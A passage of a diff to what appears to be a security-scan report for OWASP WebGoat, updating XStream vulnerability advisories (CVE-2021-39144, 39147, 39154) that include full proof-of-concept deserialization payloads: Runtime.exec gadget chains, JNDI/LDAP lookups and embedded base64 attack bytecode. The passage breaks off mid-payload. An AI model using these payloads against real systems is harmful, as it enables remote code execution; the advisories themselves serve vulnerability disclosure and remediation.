<readTimeout>0</readTimeout>\r\n                    <waitForReply>false</waitForReply>\r\n                    <replyQueueSize>0</replyQueueSize>\r\n                    <useSsl>false</useSsl>\r\n                    <useDefaultPortNumber>false</useDefaultPortNumber>\r\n                    <parentIsLdapCtx>false</parentIsLdapCtx>\r\n                    <hopCount>0</hopCount>\r\n                    <unsolicited>false</unsolicited>\r\n                    <sharable>false</sharable>\r\n                    <enumCount>1</enumCount>\r\n                    <closeRequested>false</closeRequested>\r\n                  </homeCtx>\r\n                  <more>true</more>\r\n                  <hasMoreCalled>true</hasMoreCalled>\r\n                  <startName class='javax.naming.ldap.LdapName' serialization='custom'>\r\n                    <javax.naming.ldap.LdapName>\r\n                      <default/>\r\n                      <string>uid=ysomap,ou=oa,dc=example,dc=com</string>\r\n                    </javax.naming.ldap.LdapName>\r\n                  </startName>\r\n                  <searchArgs>\r\n                    <name class='javax.naming.CompoundName' reference='../../listArg'/>\r\n                    <filter>ysomap</filter>\r\n                    <cons>\r\n                      <searchScope>1</searchScope>\r\n                      <timeLimit>0</timeLimit>\r\n                      <derefLink>false</derefLink>\r\n                      <returnObj>true</returnObj>\r\n                      <countLimit>0</countLimit>\r\n                    </cons>\r\n                    <reqAttrs/>\r\n                  </searchArgs>\r\n                  <entries>\r\n                    <com.sun.jndi.ldap.LdapEntry>\r\n                      <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>\r\n                      <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                        <default>\r\n                          <ignoreCase>false</ignoreCase>\r\n                        </default>\r\n                        <int>4</int>\r\n                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ordered>false</ordered>\r\n                              <attrID>objectClass</attrID>\r\n                            </default>\r\n                            <int>1</int>\r\n                            <string>javaNamingReference</string>\r\n                          </javax.naming.directory.BasicAttribute>\r\n                          <com.sun.jndi.ldap.LdapAttribute>\r\n                            <default>\r\n                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>\r\n                                <javax.naming.CompositeName>\r\n                                  <int>0</int>\r\n                                </javax.naming.CompositeName>\r\n                              </rdn>\r\n                            </default>\r\n                          </com.sun.jndi.ldap.LdapAttribute>\r\n                        </com.sun.jndi.ldap.LdapAttribute>\r\n                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ordered>false</ordered>\r\n                              <attrID>javaCodeBase</attrID>\r\n                            </default>\r\n                            <int>1</int>\r\n                            <string>http://127.0.0.1/</string>\r\n                          </javax.naming.directory.BasicAttribute>\r\n                          <com.sun.jndi.ldap.LdapAttribute>\r\n                            <default>\r\n                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>\r\n                                <javax.naming.CompositeName>\r\n                                  <int>0</int>\r\n                                </javax.naming.CompositeName>\r\n                              </rdn>\r\n                            </default>\r\n                          </com.sun.jndi.ldap.LdapAttribute>\r\n                        </com.sun.jndi.ldap.LdapAttribute>\r\n                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ordered>false</ordered>\r\n                              <attrID>javaClassName</attrID>\r\n                            </default>\r\n                            <int>1</int>\r\n                            <string>foo</string>\r\n                          </javax.naming.directory.BasicAttribute>\r\n                          <com.sun.jndi.ldap.LdapAttribute>\r\n                            <default>\r\n                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>\r\n                                <javax.naming.CompositeName>\r\n                                  <int>0</int>\r\n                                </javax.naming.CompositeName>\r\n                              </rdn>\r\n                            </default>\r\n                          </com.sun.jndi.ldap.LdapAttribute>\r\n                        </com.sun.jndi.ldap.LdapAttribute>\r\n                        <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ordered>false</ordered>\r\n                              <attrID>javaFactory</attrID>\r\n                            </default>\r\n                            <int>1</int>\r\n                            <string>EvilObj</string>\r\n                          </javax.naming.directory.BasicAttribute>\r\n                          <com.sun.jndi.ldap.LdapAttribute>\r\n                            <default>\r\n                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>\r\n                                <javax.naming.CompositeName>\r\n                                  <int>0</int>\r\n                                </javax.naming.CompositeName>\r\n                              </rdn>\r\n                            </default>\r\n                          </com.sun.jndi.ldap.LdapAttribute>\r\n                        </com.sun.jndi.ldap.LdapAttribute>\r\n                      </attributes>\r\n                    </com.sun.jndi.ldap.LdapEntry>\r\n                  </entries>\r\n                </aliases>\r\n              </it>\r\n            </mm>\r\n          </multiPart>\r\n        </sm>\r\n      </message>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39147.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -728,14 +436,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.\r\n\r\n# PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='sun.tracing.NullProvider'>\r\n        <active>true</active>\r\n        <providerType>java.lang.Comparable</providerType>\r\n        <probes>\r\n          <entry>\r\n            <method>\r\n              <class>java.lang.Comparable</class>\r\n              <name>compareTo</name>\r\n              <parameter-types>\r\n                <class>java.lang.Object</class>\r\n              </parameter-types>\r\n            </method>\r\n            <sun.tracing.dtrace.DTraceProbe>\r\n              <proxy class='java.lang.Runtime'/>\r\n              <implementing__method>\r\n                <class>java.lang.Runtime</class>\r\n                <name>exec</name>\r\n                <parameter-types>\r\n                  <class>java.lang.String</class>\r\n                </parameter-types>\r\n              </implementing__method>\r\n            </sun.tracing.dtrace.DTraceProbe>\r\n          </entry>\r\n        </probes>\r\n      </handler>\r\n    </dynamic-proxy>\r\n    <string>calc</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39144.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.\r\n\r\n# PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='sun.tracing.NullProvider'>\r\n        <active>true</active>\r\n        <providerType>java.lang.Comparable</providerType>\r\n        <probes>\r\n          <entry>\r\n            <method>\r\n              <class>java.lang.Comparable</class>\r\n              <name>compareTo</name>\r\n              <parameter-types>\r\n                <class>java.lang.Object</class>\r\n              </parameter-types>\r\n            </method>\r\n            <sun.tracing.dtrace.DTraceProbe>\r\n              <proxy class='java.lang.Runtime'/>\r\n              <implementing__method>\r\n                <class>java.lang.Runtime</class>\r\n                <name>exec</name>\r\n                <parameter-types>\r\n                  <class>java.lang.String</class>\r\n                </parameter-types>\r\n              </implementing__method>\r\n            </sun.tracing.dtrace.DTraceProbe>\r\n          </entry>\r\n        </probes>\r\n      </handler>\r\n    </dynamic-proxy>\r\n    <string>calc</string>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39144.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39144.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-94",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-94", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -750,14 +454,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n        <default>\r\n          <loadFactor>0.75</loadFactor>\r\n          <threshold>525</threshold>\r\n        </default>\r\n        <int>700</int>\r\n        <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n        <default>\r\n          <defaultLocale>zh_CN</defaultLocale>\r\n          <resourceCache/>\r\n        </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n        <default>\r\n          <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <string>ggg</string>\r\n                <javax.swing.UIDefaults_-ProxyLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>\r\n                  </args>\r\n                </javax.swing.UIDefaults_-ProxyLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n          </tables>\r\n        </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39154.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n        <default>\r\n          <loadFactor>0.75</loadFactor>\r\n          <threshold>525</threshold>\r\n        </default>\r\n        <int>700</int>\r\n        <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n        <default>\r\n          <defaultLocale>zh_CN</defaultLocale>\r\n          <resourceCache/>\r\n        </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n        <default>\r\n          <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <string>ggg</string>\r\n                <javax.swing.UIDefaults_-ProxyLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>\r\n                  </args>\r\n                </javax.swing.UIDefaults_-ProxyLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n          </tables>\r\n        </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39154.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -772,14 +472,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <dynamic-proxy>\r\n    <interface>map</interface>\r\n    <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>\r\n\t  <classToInvocationHandler class='linked-hash-map'/>\r\n      <defaultHandler class='sun.tracing.NullProvider'>\r\n        <active>true</active>\r\n        <providerType>java.lang.Object</providerType>\r\n        <probes>\r\n          <entry>\r\n            <method>\r\n              <class>java.lang.Object</class>\r\n              <name>hashCode</name>\r\n              <parameter-types/>\r\n            </method>\r\n            <sun.tracing.dtrace.DTraceProbe>\r\n              <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>\r\n                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n                  <default>\r\n                    <__name>Pwnr</__name>\r\n                    <__bytecodes>\r\n                      <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>\r\n                      <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n                    </__bytecodes>\r\n                    <__transletIndex>-1</__transletIndex>\r\n                    <__indentNumber>0</__indentNumber>\r\n                  </default>\r\n                </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n              </proxy>\r\n              <implementing__method>\r\n                <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>\r\n                <name>getOutputProperties</name>\r\n                <parameter-types/>\r\n              </implementing__method>\r\n            </sun.tracing.dtrace.DTraceProbe>\r\n          </entry>\r"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <dynamic-proxy>\r\n    <interface>map</interface>\r\n    <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>\r\n\t  <classToInvocationHandler class='linked-hash-map'/>\r\n      <defaultHandler class='sun.tracing.NullProvider'>\r\n        <active>true</active>\r\n        <providerType>java.lang.Object</providerType>\r\n        <probes>\r\n          <entry>\r\n            <method>\r\n              <class>java.lang.Object</class>\r\n              <name>hashCode</name>\r\n              <parameter-types/>\r\n            </method>\r\n            <sun.tracing.dtrace.DTraceProbe>\r\n              <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>\r\n                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n                  <default>\r\n                    <__name>Pwnr</__name>\r\n                    <__bytecodes>\r\n                      <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50